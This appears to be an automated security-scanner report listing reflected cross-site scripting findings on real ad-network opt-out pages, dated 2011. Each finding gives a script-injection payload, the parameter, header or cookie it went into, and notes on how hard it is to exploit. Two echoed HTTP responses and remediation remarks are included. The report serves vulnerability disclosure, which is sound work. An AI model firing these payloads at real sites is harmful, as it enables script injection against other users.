The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 9bf99'><script>alert(1)</script>289c701a59c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 43e9c'><script>alert(1)</script>ff1ecc33843 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 2f991'><script>alert(1)</script>9ca8bd1e85c was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 5 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 89e0b'><script>alert(1)</script>6fe96d9d237 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 6 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload fcb73'><script>alert(1)</script>b562a0271e6 was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 7 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18913'><script>alert(1)</script>4acb06cacbc was submitted in the REST URL parameter 7. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the yahoo_token request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 3056d'><script>alert(1)</script>2b737e48203 was submitted in the yahoo_token parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload c255d<script>alert(1)</script>220945ec9e0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload aef8b'><script>alert(1)</script>d11220e980e25158f was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method; however, it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload cf3d0'><script>alert(1)</script>94fcdc6d737 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
The value of the token_nai_ad_us-ec_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 22625'><script>alert(1)</script>8ee1384bf2b was submitted in the token_nai_ad_us-ec_adtechus_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_adserver_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 90aef'><script>alert(1)</script>7f938b6c10c was submitted in the token_nai_adserver_adtechus_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_adserverec_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 58e9d'><script>alert(1)</script>55519e151d6 was submitted in the token_nai_adserverec_adtechus_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_adserverwc_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e74eb'><script>alert(1)</script>9368fe8ee1f was submitted in the token_nai_adserverwc_adtechus_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_adsonar_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e7c39'><script>alert(1)</script>978d1a01cba was submitted in the token_nai_adsonar_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_adtech_de cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7f0c9'><script>alert(1)</script>0b058d3c65a was submitted in the token_nai_adtech_de cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_advertising_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d36a0'><script>alert(1)</script>910f4583b26 was submitted in the token_nai_advertising_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_glb_adtechus_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload faec3'><script>alert(1)</script>f9eef7d7b6d was submitted in the token_nai_glb_adtechus_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the token_nai_tacoda_at_atwola_com cookie is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 458ed'><script>alert(1)</script>848fa3d6f75 was submitted in the token_nai_tacoda_at_atwola_com cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the url request parameter is copied into the HTML document as plain text between tags. The payload 66407<script>alert(1)</script>6bc6c94bbf4 was submitted in the url parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.
HTTP/1.1 302 Found
Date: Wed, 07 Sep 2011 12:46:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Set-Cookie: XO=y=1&t=249&v=3&yoo=0&nwid1=20072115599&XTS=1315399570&XSIG=RW_abL1q00XwoSCpYC7LCgnuejk-;path=/; expires=Tue, 07-Sep-2013 20:00:00 GMT;domain=.yieldmanager.net
Location: http://info.yahoo.com/nai/nai-verify.html?optoutverify=true66407<script>alert(1)</script>6bc6c94bbf4
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8
Cache-Control: private
Content-Length: 877

HTTP/1.1 302 Found
Date: Wed, 07 Sep 2011 12:46:10 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Location: http://info.yahoo.com/nai/nai-verify.html?optoutverify=true66407<script>alert(1)</script>6bc6c94bbf4
Vary: Accept-Encoding
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Cache-Control: private

The document has moved <A HREF="http://info.yahoo.com/nai/nai-v ...[SNIP]...
The value of the BIZO cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63c73"><script>alert(1)</script>d9aa13736f9 was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the BIZO cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e43f7'-alert(1)-'6af2bcfd4a9 was submitted in the BIZO cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of the rsi_csl cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ace8"><script>alert(1)</script>03186c8d848 was submitted in the rsi_csl cookie. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
The value of the rsi_csl cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload b4275'%3balert(1)//7b22ce69683 was submitted in the rsi_csl cookie. This input was echoed as b4275';alert(1)//7b22ce69683 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.